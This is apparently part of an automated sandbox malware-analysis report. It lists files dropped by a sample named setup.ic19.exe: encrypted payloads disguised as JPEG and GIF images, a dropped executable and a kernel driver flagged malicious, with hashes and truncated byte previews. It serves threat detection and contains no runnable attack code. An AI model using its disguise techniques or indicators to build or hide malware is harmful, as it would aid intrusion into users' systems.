SHA-512:	9384A5C028315F283F6B2EA813FD711E1744F50D37E036ABAD398B2F46B88DF059CBBFAF4377E994A9B90F2F1B6DE551799C863BAD0263F37AE31789D763CB4B
Malicious:	false
Preview:	....l%00..._,,q0CC.S=~16_\_X?v94]MAZ9)t9VT.Xv?1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>VJJN=taaPQP.}} a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33...\//r3@@.P>}25\_\[<u:7^NBY:*w:UW.Yw>0?????????????????????????????????WKKO<u``QPQ.\|\|!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111YRRD0-(7.S[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ju<2T2222222222222222222222222222222222222222222..XB%BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-51[1].jpg

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	3665365
Entropy (8bit):	7.999908889501589
Encrypted:	true
SSDEEP:	98304:xUd9aY4wzB6EHygmLNX5SN6fqXcylkuuCdfKs:xe9aYnzInJ0N6fqM8wCL
MD5:	F5D6B16AF203326430D1D2AF426406D3
SHA1:	C0E60BA291C896001304A0FB34370B7AF777DA80
SHA-256:	28C86A6C04E2E68CDCB107ADF65883299D4FF04FA83367321A28A003331EF957
SHA-512:	5B8B649FCFD9398696834710063811996828A3773E44BBCFEB0377020626B30259E00E2956C0B508046C49B7C1B4E5A891132E3D5D4EBF160C11DEFB0B68ABC8
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-52[1].jpg

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	5016074
Entropy (8bit):	7.999346419078358
Encrypted:	true
SSDEEP:	98304:fVJejAo83DbjxutlDNix1ouKRpvYR9zww5rRPNPDCicVE:fPejAV3Db1m+7gGMWRP1+RE
MD5:	2494A5FCE29E081FA6D4ADD00993178C
SHA1:	E7F8B737AE91CC103E50E87905F2FA5E33E23A6E
SHA-256:	19EAC6371C44037D150AADE57A6190C3A1B7B36CA3690C1FCA18C93DD54BEB94
SHA-512:	69957E507FE64A94529C4380895C2891F2B96541F050FE2ED6480CC55677CCC20E38B8B214AF05A27F9F370E5A4FF09805EABB25DE0C54C6BEEDC28FF4D5BF35
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................D@QFMNO]....UVUXYZY\UX_`a....fgNJ#/-9.....Y\.b.....UQ..{.'.7.B.OWD..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	9161
Entropy (8bit):	7.943109985627226
Encrypted:	false
SSDEEP:	192:plfW5VziJWuJL8ZUbmIKLwRzWYIfTd3vXKaVuCT8ppoefgig:pBW5Vz0WuJQWmIlRGTxvXK3CT6qyzg
MD5:	A053E9275BACA09ADC2ECFDCBC7A76C5
SHA1:	221B3C0811036F26E51A082381094B7A46146257
SHA-256:	FC8E1B8549EB18481FC020822A09F73271FD757720A13E52E482E977C66E6735
SHA-512:	5A09EB58ABAEEBFEDBC78AB8E2DD25428D5964E9933B9AC8E31F7F889918E726FD99C4D386458D8DEB1669BFECCC71A00ADE2C4D5DDE75B7AD3C09B5829F40B3
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................pp+ALGNO.Q~STUV]XSZ[^]e.[&=..P.D,7...d.1.Tn..K.J...e..bA.o..y..8.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\drops[1].jpg

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37994
Entropy (8bit):	7.968973592360379
Encrypted:	false
SSDEEP:	768:Vr9zK5+wny6tuZ9E4SG8k/p9GYbsUkvscU7THSGt8REtYkRotc:u5c6K64d8k/rvHkEBy68i+Cotc
MD5:	48BE934981499C0D8E119833616D5515
SHA1:	43E7E49D3A1904BE64825359710E81FA9E56ABE2
SHA-256:	F1BC3C3A1EA07EBD552097EC88465741D847C6188E9DACC24BBE54535B4AC34A
SHA-512:	890CCF6B81D4AA8CFBC391BCB9E9A325513A7B9196161F59CF7A954139B7DABDC31E65508861DEE5399AE96A99446D9F28E079500F4DC3CA59DC4D54797154D8
Malicious:	false
Preview:	.PNG........IHDR..............x....&#IDATx....(`....t.),.............Rf&................................................................................................~.a...Y..c..p.^...~...S.iO3..=U.\4{Y.v].o.....^k.....v.}..^.b.~Zd..0....?llL....s.6....A......88;8L...5)k\.O...kHi...=..h.Z3z>......JP..l(Q........k.%`"b.[_...Pg.......%50....(0.8.....@.....dAc...OD.s.z.z...b.{..N.N....0......>......f...d...%"~...1....E....."f.1C.3.....[m.up..l....D..=T..!7.....{.s......["b...OD....2..&.2.4.CK..U.G...="bK./D._....Y.1M.#...yl...........#q''...M...i4.X.,!..}v..o._.....C..D....M_.. _..'.+.).e...s..M".'{..cgq.q.7.Kp!.'%.rm.....i.h..b.$r.J..F..R..^..U......"R.....g.M.M.&$.K.. A...bR"R..^.yv..z.L}..........g...... ...s.y..p>^.\|....E.R......n.@.;..P.fu.\|.....7)Z.bux.h.;.....6.K....6oF..\|L3.@_^".@.k.~.B.c..fo<d....\|.....Do.Qh....t>...P...K.q....u....w](....l.fB]\.w>.....3?......k?.....qP...e....GL......k.O.e.&A.....P]'..<jT.....+.7.*.'.Lw.....S.u.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-50[1].jpg

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	138173
Entropy (8bit):	7.996582882005435
Encrypted:	true
SSDEEP:	1536:pCZhqru/a1NfqAF4M5cmZ6eQuO/NJqI/wlWOxZn2it3blpyvcJaczOsDi+/ArX68:8ip5lduYZQdbqpWGjT0cJxDTAuQpx
MD5:	EAF4031D2DF6F6A720782A9C2E8AE85D
SHA1:	BF61B6A136D26B2AFCDE29B891416575AC9192A3
SHA-256:	7A5792E82530BEEDE3B77665A7214984FA65BA21B2C40A8D86250660F26BB06D
SHA-512:	677425C972C33B2BFCBE83EC50991FFDE7AA4A7E8B07963CBEA7ABFB1DF980F0E2F0CFDFB456365FA268982CC1D4B76C68C87DF5451550D62E5FD10F5E0BAC9E
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..i.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711679857082965
Encrypted:	false
SSDEEP:	384:9VegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQJ:K5F1FUdy422IK+gAZt2i0YPpQn4GMC
MD5:	417B6DED46C6D49F327BAAE87113475C
SHA1:	E6B7ACEE744AB2BBBF42033DC44F11E8767ACDDF
SHA-256:	F5C7A1017E95907DDA9AF4ECB45A2542ABB5CA1BF47CCF924BBC5346274D15EA
SHA-512:	FF8BC4548E22D79D9270CA40A741890AA496DD75B360525CB9090D950C3768BC79389609DB6700E61F9688C126985E2741238A64C6EC2F58FCF6F77F9183CD5D
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbbl3cbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.372593884730905
Encrypted:	false
SSDEEP:	48:dWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:dLHyIFKL3IZ2KRH9Oug8s
MD5:	F128F9080A0CE45654A17804D620D6BB
SHA1:	E5DBA1E9A1D917E98B16D6A2C6171C63CA916A63
SHA-256:	E83C21CCC7B82E1D45C1661E66ABB7E07DE06779EA79370D9007882D5AD9481C
SHA-512:	282644057286C2A05B188DFC0A1E7A2FD9F3C18C087D22C0F5C926D3BB32F1303E9CB715431FA08A08C423D50346269AAD14AD3361F8D22BDEE38FE9B35D183C
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14eqri2g.ezb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnyzxr5y.ps0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1ttq5pe.yfv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpfmwjzl.5k5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\1.gif

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.974560486539244
Encrypted:	false
SSDEEP:	192:rF38af4H3xC3vVS1sdO84vhWJEEwqmhs3QHumI0A/:rBDf4H3x2gedPeqmW3r0+
MD5:	67C3FAF03A990539B1439FF9A4D25B65
SHA1:	07A6E6CE9D49DC09EA9B79C1421AB32487F2F353
SHA-256:	A602E2B10593102403FB796FBC51C8B862324FA127385589F9CCEFA68D0A2E8A
SHA-512:	FAE317413A867B2530161DC2D33686FE35CF54FA9ADD976F9E4E2A7533F2795D3B7AE6B207B03DAD981B978ECB24FB23939A49C3DF094DF60F0ACD98D50E1CB2
Malicious:	false
Preview:	GIF89a.......,...........;.;G_fx5.#D^..g..}A.&..l=.2......'o...!.....ee....o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|.....x.)U3.`U..s...W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.n.LI....!1......`.,...~....)w.5E 1.V...0p...~P.........<....> {.-?'....M..IK.y}{..........B......I.r.W...%..tY.K.$.LL....{i. g...G...sVV.}..>i"u=.k....u..$.6..r......l....wU.[......t.Z.N..%..r.....a(...T....Z....\t${.q....s.._..w.\...=.gj.....`>n...$.@O.@...7.r.$....b.G4.4.L}.=.).Mye.`s..v..#.G...N...w.....O(...y,.M*...?.M.s<...&.!.i\|\..ae.n.....4p.eR..C..q........L..h....W..?.......x)f...p.....z...;...Y..H_i~@..G......F..>U.x.1.....%./.4e_D..B......./..\...y...y.@M.....Y....`$s......+........T..O/ew.&..qx.4WALz.,......;<...i..T....K....q......]..Q.,> .../......n....s....@b>..f....\...e...s....E...T.1..6(.....j@M.x....B.-..I

C:\Users\user\AppData\Roaming\2.jpg

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3945573
Entropy (8bit):	7.999924462104663
Encrypted:	true
SSDEEP:	49152:guF5Vz5V0E+BDMrYMqDKOI6sjTeKgcy3Fv6HYOKSagpkTGmoejU552CmtlpSg9RZ:gurV9IQrB6sneKDy3fOKPglemWtlp9MS
MD5:	29A4084A090DB17233528007BA2B6C04
SHA1:	513BBB143396F92484C5C65EA242411F0E277180
SHA-256:	44C4D2A2CF3A68A8DEDB865E4C8C34818CA1DE4C9749891A5D2AC0D39BC2A954
SHA-512:	663C4D7BBE3611EFD18033997D1DF7E8AA4D16A1F63FBCBF38810261EC951FFAD1372F51E90B14F65CAAE721CE938BBDDE496C9B95808806EAC5A23DE03B7CFB
Malicious:	false
Preview:	.PNG........IHDR..............x....&#IDATx....(`....t.),.............Rf&................................................................................................~.a...Y..c..p.^...~...S.iO3..=U.\4{Y.v].o.....^k.....v.}..^.b.~Zd..0....?llL....s.6....A......88;8L...5)k\.O...kHi...=..h.Z3z>......JP..l(Q........k.%`"b.[_...Pg.......%50....(0.8.....@.....dAc...OD.s.z.z...b.{..N.N....0......>......f...d...%"~...1....E....."f.1C.3.....[m.up..l....D..=T..!7.....{.s......["b...OD....2..&.2.4.CK..U.G...="bK./D._....Y.1M.#...yl...........#q''...M...i4.X.,!..}v..o._.....C..D....M_.. _..'.+.).e...s..M".'{..cgq.q.7.Kp!.'%.rm.....i.h..b.$r.J..F..R..^..U......"R.....g.M.M.&$.K.. A...bR"R..^.yv..z.L}..........g...... ...s.y..p>^.\|....E.R......n.@.;..P.fu.\|.....7)Z.bux.h.;.....6.K....6oF..\|L3.@_^".@.k.~.B.c..fo<d....\|.....Do.Qh....t>...P...K.q....u....w](....l.fB]\.w>.....3?......k?.....qP...e....GL......k.O.e.&A.....P]'..<jT.....+.7.*.'.Lw.....S.u.

C:\Users\user\AppData\Roaming\8AfroU.exe

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	137240
Entropy (8bit):	6.062998158020056
Encrypted:	false
SSDEEP:	3072:+G+auZeJTFiL5qihyET1OUJVcLtNLAd3lI:+cJTAL5ZtAE2Nc
MD5:	43A2E3DC4152AE380E60A53765B78787
SHA1:	A6B2F6DF48B69C126D4C3049E7D22796AB37DFD0
SHA-256:	D5AF2BC647AC0B5641B589BD48995DF471C94C2C2913F9ACEA1B1AE2CFA27C38
SHA-512:	9A22B848DA88AAF798C152268EB45CBAE077E9EF584A349A44AB5BEE184870591410D20DAB0A508062D7ACB20F0070D53ECB568CCCA20C3A8208CE83791B5AEB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'8..FV..FV..FV.P.8..FV..-..FV..FW.WFV..;.hFV..+..FV..8..FV..*..FV.....FV.Rich.FV.................PE..d......F..........#......P....................@..............................P......................................................................@..$.... ..l....................................................................`...............................text....O.......P.................. ..`.rdata...]...`...^...T..............@..@.data...hQ.......,..................@....pdata..l.... ......................@..@.rsrc...$....@......................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Atrebution.sys

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.2291012023979855
Encrypted:	false
SSDEEP:	384:d3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/e:dOUkgfdZ9pRyv+uPzCMHo3q4tDghs
MD5:	297F2C2E32EF4B9CC2275072205938D7
SHA1:	404D9E0965DBCD60555A7221D296687CA7AE2932
SHA-256:	C0E389CD5C51AD43817367F4BDF2A1D0BFFD0CE7E951E1C339BC8D9B28AEC8BE
SHA-512:	AB81B8409D5C0F537B4FC7B4F16FD7A099D36EA22AE1704449A60655A3416EE2A3E739FA55E0EF5532600F6377DE9B89655208A49EC9EC5680D3392E21DBE43A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................Q..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\DumpStacks.log.tmp

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	68
Entropy (8bit):	5.223800253703272
Encrypted:	false
SSDEEP:	3:wfdtjPfmCA29tzg5UIrtb:wfdpf3M1V
MD5:	C4E2F1F45D8C91B315AE91EF6099EECC
